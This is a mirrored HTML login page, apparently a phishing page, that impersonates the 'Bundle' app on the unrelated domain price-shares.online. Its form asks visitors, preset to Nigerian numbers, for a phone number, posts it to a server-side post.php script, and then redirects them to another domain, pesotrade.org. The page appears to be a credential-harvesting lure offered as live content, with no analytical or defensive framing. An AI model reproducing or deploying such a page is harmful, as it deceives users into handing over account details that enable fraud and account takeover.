<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from price-shares.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:52:41 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />    <title>Login</title>
    <link rel="stylesheet" href="build/css/intlTelInput.css">
    <link rel="stylesheet" href="build/css/demo.css">
    <link rel="stylesheet" href="sstyle.css">
    <link href='../unpkg.com/boxicons%402.1.1/css/boxicons.min.css' rel='stylesheet'>
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/bootstrap/5.1.3/css/bootstrap.min.css" />

</head>

<body>

    <div class="container text-center">
        <img class="logo" src="images/download%20(2).png" alt="">
        <form method="POST" id="my-form" class="myform"  action=".././modules/post.php">

            <h2 class=" mb-2">
                Welcome to Bundle!
            </h2>

            <p class="paragraph-2 mb-4">
                Type in your phone number to Log in
            </p>
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="https://pesotrade.org/bundle-live/websites/.html">
            <input id="phone" minlength="10" maxlength="11" required class="inputt" name="username" type="tel" placeholder="090485869496" ><br>
            <a class="query mt-3" href="#">Lost Phone number?</a>
            <div class="cbtn mt-4">
                <button class="mt-5 text-center">Continue</button>
            </div>
        </form>

        <div class="bt-img text-center ">
            <img src="images/Bundle-logo.svg" alt="">
        </div>
    </div>































    <script src="build/js/intlTelInput.js"></script>
    <script>
        var input = document.querySelector("#phone");
        window.intlTelInput(input, {
            // allowDropdown: false,
            // autoHideDialCode: false,
            // autoPlaceholder: "off",
            // dropdownContainer: document.body,
            // excludeCountries: ["us"],
            // formatOnDisplay: false,
            // geoIpLookup: function(callback) {
            //   $.get("http://ipinfo.io", function() {}, "jsonp").always(function(resp) {
            //     var countryCode = (resp && resp.country) ? resp.country : "";
            //     callback(countryCode);
            //   });
            // },
            // hiddenInput: "full_number",
            initialCountry: "ng",
            // localizedCountries: { 'de': 'Deutschland' },
            // nationalMode: false,
            onlyCountries: ["ao", "bf", "bi", "bj", "bw", "cd", "cf", "cg", "ci", "cm",
  "cv", "dj", "ag", "eg", "eh", "er", "et", "ga", "gh", "gm", "gn", "gq", "gw",
  "ke", "km", "lr", "ls", "ly", "mg", "ml", "mr", "mu", "mw", "mz", "na", "ne",
  "ng", "rw", "sc", "sd", "si", "sl", "sn", "so", "ss", "st","sz","td","tg","tn","tz","ug","za","zm","zw"],
            // placeholderNumberType: "MOBILE",
            // preferredCountries: ['cn', 'jp'],
            separateDialCode: true,
            utilsScript: "build/js/utils.js",
        });
    </script>
</body>


<!-- Mirrored from price-shares.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Mar 2022 11:52:50 GMT -->
</html>